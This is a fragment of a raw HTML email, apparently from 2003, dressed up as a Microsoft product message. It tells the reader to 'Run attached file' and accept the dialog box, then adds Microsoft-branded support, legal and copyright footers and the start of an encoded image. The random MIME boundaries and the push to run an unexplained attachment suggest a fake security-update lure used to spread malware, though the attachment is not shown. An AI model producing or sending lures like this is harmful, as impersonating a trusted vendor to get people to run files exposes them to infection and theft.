VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:bekmytt" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;How to install</B></FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">Run attached file. = Choose Yes on displayed dialog box.</FONT></TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:bekmytt" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;How to use</B></FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">You don't need to do = anything after installing this item.</FONT></TD> </TR> </TABLE> <BR> <TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2"> Microsoft Product Support Services and Knowledge Base articles can be found on the <A HREF=3D"http://support.microsoft.com/" = TARGET=3D"_top">Microsoft Technical Support</A> web site. = For security-related information about Microsoft products, please = visit the <A HREF=3D"http://www.microsoft.com/security" TARGET=3D"_top"> Microsoft Security Advisor</A> web site, = or <A HREF=3D"http://www.microsoft.com/contactus/contactus.asp" = TARGET=3D"_top">Contact Us.</A> <BR><BR> Thank you for using Microsoft products.<BR><BR></FONT> <FONT SIZE=3D"1">Please do not reply to this message. = It was sent from an unmonitored e-mail address and we are unable = to respond to any replies.<BR></FONT> <HR COLOR=3D"Silver" SIZE=3D"1" WIDTH=3D"100%"> <FONT SIZE=3D"1" COLOR=3D"Gray">The names of the actual companies and = products mentioned herein are the trademarks = of their respective owners.</FONT> </TD></TR></TABLE> <BR> <TABLE WIDTH=3D"600" HEIGHT=3D"45" BGCOLOR=3D"#1478EB"> <TR VALIGN=3D"TOP"> <TD WIDTH=3D"5"></TD> <TD> <FONT COLOR=3D"#FFFFFF" SIZE=3D"1"><B> <A class=3D'navtext' HREF=3D"http://www.microsoft.com/= contactus/contactus.asp" TARGET=3D"_top">Contact Us</A> &nbsp;|&nbsp; <A class=3D'navtext' HREF=3D"http://www.microsoft.com/legal/" = TARGET=3D"_top">Legal</A> &nbsp;|&nbsp; <A class=3D'navtext' HREF=3D"https://www.truste.org/validate/605" = TARGET=3D"_top" TITLE=3D"TRUSTe - Click to Verify">TRUSTe</A> </FONT></B> </TD> </TR> <TR VALIGN=3D"MIDDLE"> <TD WIDTH=3D"5"></TD> <TD> <FONT COLOR=3D"#FFFFFF" SIZE=3D"1"> &copy;2003 Microsoft Corporation. All rights reserved. <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= info/cpyright.htm" TARGET=3D"_top">Terms of Use</A> &nbsp;|&nbsp; <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= info/privacy.htm" TARGET=3D"_top"> Privacy Statement</A>&nbsp;|&nbsp; <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= enable/" TARGET=3D"_top">Accessibility</A> </FONT> </TD> </TR> </TABLE> </BODY> </HTML> --nvtntndnla-- --aysnrgdolyuqhuaf Content-Type: image/gif Content-Transfer-Encoding: base64 Content-ID: <rfovdvi> R0lGODlhaAA7APcAAP///+rp6puSp6GZrDUjUUc6Zn53mFJMdbGvvVtXh2xre8bF1x8cU4yLprOy zIGArlZWu25ux319xWpqnnNzppaWy46OvKKizZqavLa2176+283N5sfH34uLmpKSoNvb7c7O3L29 yqOjrtTU4crK1Nvb5erq9O/v+O7u99PT2sbGzePj6vLy99jY3Pv7/vb2+fn5++/v8Kqr0oWHuNbX 55SVoszN28vM2pGUr7S1vqqtv52frOPl8CQvaquz2Ojp7pmn3Ozu83OPzmmT6F1/xo6Voh9p2C5z 3EWC31mS40Zxr4uw6LXN8iZkuXmn55q97PH2/Yir1rbL5iVTh3Oj2cvX5Pv9/+/w8QF8606h62Wk 3n+dubnY9abB2c7n/83h9Nji6weK+CGJ4Vim6WyKpKWssgFyyAaV/0Km8Gyx6HW57FJxicDP2+Tt 9Pj8/wOa/wmL5wqd/w6V8heb91e5+mS9+VmLr4vD6qvc/b/j/Mbn/sTi9rvX6szq/tPt/9ju/dzx /+n2/+74//P6/+3w8hOh/xOW6yCm/iuu/zWv/0m4/XTH/IXK95TP9